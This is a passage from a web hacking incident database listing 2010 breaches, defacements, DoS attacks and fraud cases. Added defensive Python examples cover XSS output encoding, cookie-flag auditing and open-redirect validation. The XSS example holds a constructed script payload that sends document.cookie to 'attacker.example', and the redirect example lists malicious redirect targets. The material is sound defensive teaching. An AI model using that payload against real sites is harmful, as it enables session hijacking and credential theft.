Incident Description: The New York City-based spokesman for Kwame Kilpatrick complained this afternoon that www.friendsofkwame.com is not working properly, and he suspects hackers. Mike Paul said he is investigating the matter seriously and will pursue prosecution if the site he is promoting on Kwame Kilpatrick’s behalf indeed has been tampered with by outsiders.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.freep.com/article/20100505/NEWS01/100505073/1322/Kilpatricks-site-down-spokesman-suspects-hackers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-76: Website hacked, election officials say
WHID ID: 2010-76
Date Occured: 5/5/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Local elections officials say their website was hacked as they tried to communicate the results of the Tuesday, May 4, primary election — crashing the site several times and delaying the announcement of vote tallies. “We have crashed three servers, and in examining those servers, there are two unidentified sites that are deliberately diverting traffic,” said Butler County Board of Elections Director Betty McGary as her frenzied staff struggled to post election results. “Our servers are under attack, we feel,” McGary said, stressing that the problem pertained only to transmitting totals to the public, not accurately counting the votes.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.middletownjournal.com/news/election/website-hacked-election-officials-say-687529.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-75: Russian-born hacker selling 1.5m Facebook usernames
WHID ID: 2010-75
Date Occured: 4/24/2010
Attack Method: Stolen Credentials
Application Weakness: Unknown
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A Russian-born hacker is attempting to sell Facebook IDs for as little as $25 per 100 usernames, social-media blog Mashable reports, citing researchers at VeriSign's iDefense. The hacker, who calls himself Kirllos, has obtained 1.5 million Facebook IDs, or one for every 300 people who use the social networking website.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.news.com.au/technology/russian-born-hacker-selling-15m-facebook-usernames/story-e6frfro0-1225857706897
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-74: Another Zimbabwe news website attacked by hackers
WHID ID: 2010-74
Date Occured: 4/24/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Zimbabwe
Incident Description: London (ZimEye) Another Zimbabwe news website, the ZimDiaspora, has been hacked by online criminals. As of Saturday, the website was no longer functioning, and one of the editors speaking to ZimEye on Saturday said that neither he nor the hosting company were able to restore the site at the moment. Despite the hosting company's apparent desperation on Saturday, ZimEye was able to trace the notorious hackers to a location in the Indonesian town of Bandung. The hackers specialise in hacking websites made with the Joomla software on which the ZimDiaspora is built. They have also openly declared that this is their field of speciality.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.zimeye.org/?p=16521
Attack Source Geography: Indonesia
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-73: Report: Music insider site source of leaked songs
WHID ID: 2010-73
Date Occured: 4/23/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: As if the record industry hasn't tasted enough bitter irony lately, a bunch of album leaks over the weekend apparently came from a service used by music labels to share files with radio stations, media, and other trusted insiders. According to a post on AbsolutePunk, somebody signed up for an account with Play MPE under false pretenses, claiming to be an Australian music critic. Then this person--apparently a teenage boy--figured out how to access music he wasn't entitled to, including upcoming releases by The Black Keys, Macy Gray, Hole, The Gaslight Anthem, and many other artists. The AbsolutePunk story referred to this kid as a hacker, but looking at his self-described exploits, that term might be a little too strong. It's not as if he did any sophisticated DRM cracking. Rather, he noticed that the URL in the Web-based download file had the characters "songid=" followed by a bunch of numbers. By changing the numbers, he was apparently able to get other song downloads that he wasn't supposed to see.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-13526_3-20003331-27.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-72: Blippy users’ credit card numbers found on Google
WHID ID: 2010-72
Date Occured: 4/23/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insecure Indexing
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Yesterday was a big day for social-oversharing site Blippy, which lets members automatically post their purchases to the Internet. The company announced $11.2 million in funding and was profiled in The New York Times. Overnight, at least one Internet power user figured out a way to search for Blippy members’ credit card numbers on Google. A fairly obvious search for “from card” this morning returned 127 results that included full credit card numbers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://venturebeat.com/2010/04/23/blippy-credit-card-citibank/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-71: Fire Alarm Company Burned by e-Banking Fraud
WHID ID: 2010-71
Date Occured: 4/7/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: A fire alarm company in Arkansas lost more than $110,000 this month when hackers stole the firm’s online banking credentials and drained its payroll account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/04/fire-alarm-company-burned-by-e-banking-fraud/
Attack Source Geography:
Attacked System Technology:
Cost: $110000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-70: Armenian websites attacked by Turkish hackers
WHID ID: 2010-70
Date Occured: 4/12/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Armenia
Incident Description: Turkish hackers have attacked several Armenian websites ahead of annual commemorative remembrances of the Armenian Genocide. On April 12th, more than 250 sites were impacted when cyber terrorists attacked a server hosting sites including www.ArmeniaChat.com, www.ArmeniaSearch.com according to the owner of the sites (who wishes to remain anonymous), ANCA Communications Director Elizabeth Chouljian told PanARMENIAN.Net. The attackers also took down www.armenian.com, which is the website for Armenian Directory Yellow pages. Attackers attempted to hack into a second server which hosts www.ArmGate.com but were unsuccessful. All the websites attacked were offline for a period of two days due to the damage caused by the attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.panarmenian.net/eng/it_telecom/news/47183/
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-69: Walmart web site hacked and hosting spam
WHID ID: 2010-69
Date Occured: 4/15/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Link Spam
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: One of Walmart's official web sites, www.walmartcommunity.com (for their Community Action Network), has SPAM links. The attackers probably injected the spam in one of their template files. After a bit of searching, we found all of them inside the footer.php
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/04/walmart-web-site-hacked-and-hosting.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-68: Daily Telegraph website hacked
WHID ID: 2010-68
Date Occured: 4/15/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: United Kingdom
Incident Description: Part of the Daily Telegraph's website has been hacked, apparently by people in Romania who were aggrieved at its identification of "gypsies" and "Romanians". Its "Short Breaks" and Wine And Dine sections were both hacked, with the Short Breaks site still up at 12.55pm today, with a picture of a Romanian flag claiming to be for the "Romanian National Security", some comments in Romanian and the remark in English at the bottom that "Guess what, gypsies aren't romanians, morons." It also links to a Russian site which plays an MP3 called The Lonely Shepherd. Sunbelt Software, which first noticed the hack, said that it had alerted the Telegraph when it noticed the hack. The method used to hack into the site is not known.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.guardian.co.uk/media/2010/apr/15/daily-telegraph-hacking
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-67: Apache.org hit by targeted XSS attack, passwords compromised
WHID ID: 2010-67
Date Occured: 4/9/2010
Attack Method: Brute Force
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text: ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured] Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged in to JIRA. When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.zdnet.com/security/?p=6123&tag=nl.e539
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
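The Apache incident has two independent failures worth separating: the JIRA page reflected attacker-controlled input as markup (the XSS), and the session cookie was readable by script, which is what turned a page defacement into stolen administrator sessions. The block below is an added example, not Apache's or Atlassian's code. It renders a reflected parameter without and with HTML output encoding, then audits a Set-Cookie header for the flags that decide whether injected script can read the session at all; the template, parameter name, cookie name and payload are constructed for the illustration.

```python
"""Added example (not Apache's or Atlassian's code): the two halves of the attack
described above, reproduced in miniature. First, a page that reflects a request
parameter, rendered without and with HTML output encoding. Second, an audit of
the Set-Cookie header that decides whether a successful script injection can
read the session cookie at all; HttpOnly is the flag that keeps document.cookie
from returning it.

The page template, the parameter name, the cookie name and the payload are
constructed for the example."""
import html
from urllib.parse import parse_qs, quote

# A cookie-stealing payload of the kind the text describes (constructed). It
# makes the victim's browser fetch an attacker URL with the cookies appended.
PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"
# The query string a shortened-URL redirect would deliver to the vulnerable page.
ATTACK_QUERY = "q=" + quote(PAYLOAD)


def _param(query_string: str, name: str) -> str:
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Improper output handling: the parameter is pasted into the page as markup."""
    return f"<p>Results for: {_param(query_string, 'q')}</p>"


def render_safe(query_string: str) -> str:
    """The fix: encode for the HTML text context before interpolating."""
    return f"<p>Results for: {html.escape(_param(query_string, 'q'), quote=True)}</p>"


def contains_script(rendered: str) -> bool:
    """Would a browser see a script element in this rendered page?"""
    return "<script" in rendered.lower()


def audit_set_cookie(header: str) -> list[str]:
    """Return the weaknesses in one Set-Cookie header value (empty list if none).

    Attribute names are matched case-insensitively, as browsers do."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for p in parts[1:]:
        key, _, value = p.partition("=")
        attrs[key.strip().lower()] = value.strip()
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: no HttpOnly, so injected script can read it")
    if "secure" not in attrs:
        findings.append(f"{name}: no Secure, so it is sent over plain HTTP")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite is not Lax or Strict")
    return findings


if __name__ == "__main__":
    print(render_vulnerable(ATTACK_QUERY))
    print(render_safe(ATTACK_QUERY))
    for finding in audit_set_cookie("JSESSIONID=abc123; Path=/"):
        print("finding:", finding)
```

HttpOnly would not have removed the XSS, but it would have kept the payload from reading the cookie, and the attackers would have been left with what the script could do in the page rather than a reusable session. Both controls belong in place; the cookie flags are the cheap one to audit across an estate.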
Entry Title: WHID 2010-66: Ads to blame for malware in Facebook's FarmTown?
WHID ID: 2010-66
Date Occured: 4/12/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: The 9.6 million players of the Facebook game FarmTown are being warned about fake security warnings popping up that are designed to mislead people into paying for antivirus protection they don't need. "We are aware and have reported to the developers that many of our players have encountered the malware/spyware while on the FarmTown Site," the moderator of a user forum for FarmTown maker SlashKey warned over the weekend. "We believe at this time that it is harmless to your computer and a result of one or more of the ads on the site, but you should NOT follow any links to any software claiming to 'clean your system.'" Sophos' Graham Cluley said it appeared that third-party advertising displayed underneath the FarmTown playing window is to blame. "In all likelihood, hackers have managed to poison some of the adverts that are being served to FarmTown by the outside advert provider," Cluley wrote on his blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-20002267-245.html
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-65: NewsBusters Knocked Offline
WHID ID: 2010-65
Date Occured: 4/9/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: A deliberate brute force attack, a criminal act, knocked NewsBusters offline since late Friday morning. More information to come, but now we’re back and we thank you for bearing with us as our tech team worked studiously to restore the site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://newsbusters.org/?q=blogs/nb-staff/2010/04/10/newsbusters-back-here-s-some-what-you-ve-missed
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-64: Hundreds of Wordpress Blogs Hit by ‘Networkads.net’ Hack
WHID ID: 2010-64
Date Occured: 4/9/2010
Attack Method: Predictable Resource Location
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Blogs
Attacked Entity Geography:
Incident Description: A large number of bloggers using Wordpress are reporting that their sites recently were hacked and are redirecting visitors to a page that tries to install malicious software. According to multiple postings on the Wordpress user forum and other blogs, the attack doesn’t modify or create files, but rather appears to inject a Web address — “networkads.net/grep” — directly into the target site’s database, so that any attempts to access the hacked site redirects the visitor to networkads.net. Worse yet, because of the way the attack is carried out, victim site owners are at least temporarily locked out of accessing their blogs from the Wordpress interface. It’s not clear yet whether the point of compromise is a Wordpress vulnerability (users of the latest, patched version appear to be most affected), a malicious Wordpress plugin, or if a common service provider may be the culprit. However, nearly every site owner affected so far reports that Network Solutions is their current Web hosting provider.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-63: Police cuff 70 eBay fraud suspects
WHID ID: 2010-63
Date Occured: 4/6/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Fraud
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: Romanian police have arrested 70 suspected cybercrooks, thought to be members of three gangs which allegedly used compromised eBay accounts to run scams. The alleged fraudsters obtained login credentials using phishing scams before using these trusted profiles to tout auctions for non-existent luxury goods (luxury cars, Rolex watches and even a recreational aircraft). Buyers handed over the loot but never received any goods in return.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/04/07/romania_cybercrime_bust/
Attack Source Geography: Romania
Attacked System Technology: eBay
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-62: Computer Crooks Steal $100,000 from Ill. Town
WHID ID: 2010-62
Date Occured: 3/11/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Illinois, USA
Incident Description: A rash of home foreclosures and abandoned dwellings had already taken its toll on the tax revenue for the Village of Summit, a town of 10,000 just outside Chicago. Then, in March, computer crooks broke into the town’s online bank account, making off with nearly $100,000. According to Rivera, the theft took place Mar. 11, when her assistant went to log in to the town’s account at Bridgeview Bank. When the assistant submitted the credentials to the bank’s site, she was redirected to a page telling her that the bank’s site was experiencing technical difficulties. What she couldn’t have known was that the thieves were stalling her so that they could use the credentials she’d supplied to create their own interactive session with the town’s bank account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/04/computer-crooks-steal-100000-from-ill-town/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-61: How Chinese Hackers Exploit Twitter, Google and Yahoo
WHID ID: 2010-61
Date Occured: 4/6/2010
Attack Method: Abuse of Functionality
Application Weakness: Abuse of Functionality
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: A stunning new report issued last night by a team of U.S. and Canadian researchers highlights a critical development in the world of cyber crime: the use of popular services like Twitter, Google (GOOG) and Yahoo (YHOO) to camouflage and carry out infiltrations at the highest level of international government and business.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.bnet.com/business-news/?p=856
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.scribd.com/doc/29435784/SHADOWS-IN-THE-CLOUD-Investigating-Cyber-Espionage-2-0
Entry Title: WHID 2010-60: CNN redirect exploited by scammers
WHID ID: 2010-60
Date Occured: 4/6/2010
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: Spammers used an open redirect vulnerability in a CNN ad site. The clever touch was providing a link that exploits redirect functionality supported by CNN’s ad servers. The link is structured as follows: http://ads.cnn.com/event.ng/Type=click&Redirect=http:/bit.ly/cP–XW Clicking on the link sends a request to CNN which instructs the browser to send a second request to the redirect URL – in this case the shortened http:/bit.ly/cP—XW. The host site would not be aware of the misuse – the spammer is simply abusing legitimate ad-serving functionality. This technique provides several advantages to the spammer: 1) The URL from cnn.com might give the impression that there was a genuine CNN-worthy story to be found; 2) The reputable site name would allay fears of anything malicious lurking at the end of the click; 3) Most URL filtering solutions would not block the initial request to cnn.com (although reputable solutions would have been updated in real time about the follow-on link, which would be blocked).
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.commtouch.com/cafe/email-security-news/cnn-redirect-exploited-by-scammers/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+CommtouchCafe+(Commtouch+Café)
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
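The fix for an open redirect is to treat the Redirect parameter as untrusted input and validate it against an allow list before echoing it into a Location header. One detail in the spam link above deserves attention: the target is written http:/bit.ly/... with a single slash. Browsers quietly repair that to http://bit.ly/..., but a URL parser sees a scheme with an empty host, so a check that reads "no host, therefore a local path" would wave it through. The block below is an added example, not CNN's or its ad server's code; the allow-listed hosts and the sample targets are assumptions for the illustration.

```python
"""Added example (not CNN's or its ad server's code): a redirect-parameter
validator that closes the open redirect described above. It also covers the
detail visible in the spam link, a target written as http:/bit.ly/... with a
single slash, which browsers silently repair to http://bit.ly/... but which a
naive "no host, so it must be a local path" check would pass.

The allow-listed hosts and the sample targets below are assumptions for the
example."""
from urllib.parse import urlsplit

# Hosts this application is willing to redirect to (assumed for the example).
ALLOWED_HOSTS = {"www.cnn.com", "ads.cnn.com"}
DEFAULT_TARGET = "/"


def redirect_vulnerable(target: str) -> str:
    """What the abused endpoint effectively did: echo the parameter into Location."""
    return target


def redirect_safe(target: str) -> str:
    """Return `target` only if it is a same-site absolute path or an http(s) URL
    on an allow-listed host; otherwise fall back to DEFAULT_TARGET."""
    if not target:
        return DEFAULT_TARGET
    # Browsers treat backslashes like forward slashes; normalise before parsing.
    t = target.strip().replace("\\", "/")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in t):
        return DEFAULT_TARGET
    parts = urlsplit(t)
    if parts.scheme:
        # An absolute URL. "http:/bit.ly/x" lands here with an empty netloc, so
        # hostname is None and the allow-list check rejects it, as it should.
        if parts.scheme.lower() not in ("http", "https"):
            return DEFAULT_TARGET
        host = (parts.hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            return DEFAULT_TARGET
        return t
    # No scheme: accept only an absolute same-site path. "//evil.example" is
    # scheme-relative and would leave the site, so it is rejected too.
    if t.startswith("//") or parts.netloc or not t.startswith("/"):
        return DEFAULT_TARGET
    return t


# Constructed sample targets of the kind seen in redirect-abuse spam.
SAMPLES = [
    "/video/latest",
    "http://www.cnn.com/2010/US/story.html",
    "http:/bit.ly/abc123",                 # single slash, as in the spam link
    "http://bit.ly/abc123",
    "//evil.example/phish",
    "/\\evil.example/phish",
    "http://www.cnn.com@evil.example/",    # userinfo trick
    "http://www.cnn.com.evil.example/",    # prefix-match trick
    "javascript:alert(document.domain)",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:45} -> {redirect_safe(s)!r}")
```

For an ad click-tracker the cleaner design is to not accept a URL at all: store the destination server-side when the creative is booked and put only an opaque click id in the link. Where a URL parameter must stay, the validator above should be the single code path that produces the Location header.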
Entry Title: WHID 2010-59: Orange Regional Website Hacked
WHID ID: 2010-59
Date Occured: 2/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: Ivory Coast
Incident Description: A Lebanese hacker claims to have hacked Orange's regional website in Cote d'Ivoire (Ivory Coast) through SQL injection. The attack allegedly gave him access to the website's administration interface and information on almost 60,000 customers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Orange-Regional-Website-Hacked-134467.shtml
Attack Source Geography: Lebanon
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 60000
Additional Link:
Entry Title: WHID 2010-58: China journalist club shuts website after attack
WHID ID: 2010-58
Date Occured: 4/1/2010
Attack Method: Unknown
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: China
Incident Description: The Foreign Correspondents Club of China said on Friday it had shut its website after a burst of hacker attacks, days after attacks on the Yahoo email accounts of some foreign journalists covering China were discovered. "We do not know who is behind the attacks or what their motivation is," the club's board said in an emailed statement explaining it had decided to shut down temporarily the site after two days of "persistent" attacks. The club has traced the online assault to IP addresses in both China and the U.S., but added that these machines could have been taken over by hackers in other locations. The hacking was the latest of several recent incidents that have brought to light the Internet vulnerabilities of people or groups whose work may raise hackles in China.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.reuters.com/assets/print?aid=USTOE63101R20100402
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-57: Web security under attack from ads in prominent advertising programs
WHID ID: 2010-57
Date Occured: 3/31/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description: Advertisement programs operated by Google, Yahoo and Fox were recently found to deliver malware, according to CNET. Avast, the Czech Republic-based web security company, discovered the malware and stated that this particular strain targets holes in popular web browsers such as Firefox and Internet Explorer. Yahoo's Yield Manager and Fox FirmServe manage nearly 50 percent of all online ads. Google's program DoubleClick was found to contain some malvertisements, but not to the extent of Yield Manager or FirmServe. Other advertising platforms like Facebook and MySpace have also experienced similar problems in recent months.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-56: Facebook Flub Leaks Private E-Mail Addresses
WHID ID: 2010-56
Date Occured: 3/31/2010
Attack Method: Misconfiguration
Application Weakness: Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Private e-mail addresses that many Facebook users wanted to keep hidden were revealed publicly last night on a multitude of Facebook profiles, Gawker reports. The glitch lasted about 30 minutes before Facebook sealed the gap. It might be that Facebook's recently proposed changes to its privacy settings could be to blame for the hiccup. PC World writer Paul Suarez reported that "One of those changes [to Facebook's Privacy Policy and Statement of Rights and Responsibilities] would make it possible for Facebook to send your name, photo, friend list, and any public information about you and your friends to preapproved third-party Web sites." A slight tweak to broadcasting profile information could have resulted in this embarrassing flub.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-55: Drudge Report accused of serving malware, again
WHID ID: 2010-55
Date Occured: 3/9/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: For the second time in less than six months, visitors to the Drudge Report say they got malware in addition to the Web site's usual sensational headlines. Matt Drudge denied that his site was infecting visitors, however it's likely that the malware is coming from ads delivered by a third-party ad network and not the site itself.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-10466044-245.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-54: MyPilotStore.com hack results in false charges on customers’ cards
WHID ID: 2010-54
Date Occured: 2/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: On February 18, MyPlane, dba MyPilotStore.com, discovered that their database containing their customers’ names, addresses, telephone numbers, e-mail addresses, and credit card information had been hacked. According to the firm, some customers received a “nominal fake charge to their credit card by a company not associated with us.”
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.databreaches.net/?p=10990
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-53: Google says Vietnam political blogs hacked
WHID ID: 2010-53
Date Occured: 3/31/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Web 2.0
Attacked Entity Geography: Vietnam
Incident Description: Internet giant Google says Vietnamese computer users have been spied on and political blogs hacked in attacks which a leading web security firm suspects are linked to the Vietnamese government. The incidents recall cyber attacks in China that Google in January said had struck it and other unidentified firms in an apparent bid to hack into the email accounts of Chinese human rights activists. "These infected machines have been used both to spy on their owners as well as participate in distributed denial of service attacks against blogs containing messages of political dissent," said Neel Mehta of Google's security team in the firm's Online Security Blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology%20News&x=1
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-52: 3000 Small Dog Electronics customers' credit card details compromised
WHID ID: 2010-52
Date Occured: 2/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: Electronics retailer Small Dog Electronics has suffered from a systems breach that left 3000 customers' credit card details compromised. The data theft, which left the credit card details exposed from late December to almost the end of January, used a security hole in the in-house web application that had been developed to manage Smalldog's ecommerce system. Don Mayer, CEO of Small Dog Electronics, explained that the company is PCI compliant, and that it had been subjected to a penetration test by a third party, which he would not name. The flaw in the code has now been rectified, and Small Dog is investigating the issue with the pen tester, added Mayer, who did not know what language the ecommerce system had been written in.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 3000
Additional Link:
Entry Title: WHID 2010-51: Woman worms into D.C. taxpayer accounts
WHID ID: 2010-51
Date Occured: 2/5/2010
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Washington DC, USA
Incident Description: A mentally ill woman exploited a loophole in D.C. tax office online systems to gain unauthorized access to taxpayer accounts, establish herself as the owner of dozens of businesses and file returns on their behalf. The FR-500 forms were not submitted for review before processing, BDO found, and no verification checks were performed. The loophole was a glitch, OTR explained. The agency's Integrated Tax System was supposed to deny ownership changes requested through the FR-500 function, but "faulty logic" allowed the updates automatically. Umansky said a fix is now in place and "that can't happen again."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-50: Shared-password vulnerability may have exposed personal information in online account management system
WHID ID: 2010-50
Date Occured: 1/14/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: Lincoln National Corp. (LNC) last week disclosed a security vulnerability in its portfolio information system that could have compromised the account data of approximately 1.2 million customers. In a disclosure letter (PDF) sent to the attorney general of New Hampshire Jan. 4, attorneys for the financial services firm revealed that a breach of the Lincoln portfolio information system had been reported to the Financial Industry Regulatory Authority (FINRA) by an unidentified source last August. The company was planning to issue notification to the affected customers on Jan. 6, the letter says. The letter does not give technical details about the breach, but it indicates the unidentified source sent FINRA a username and password to the portfolio management system.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034
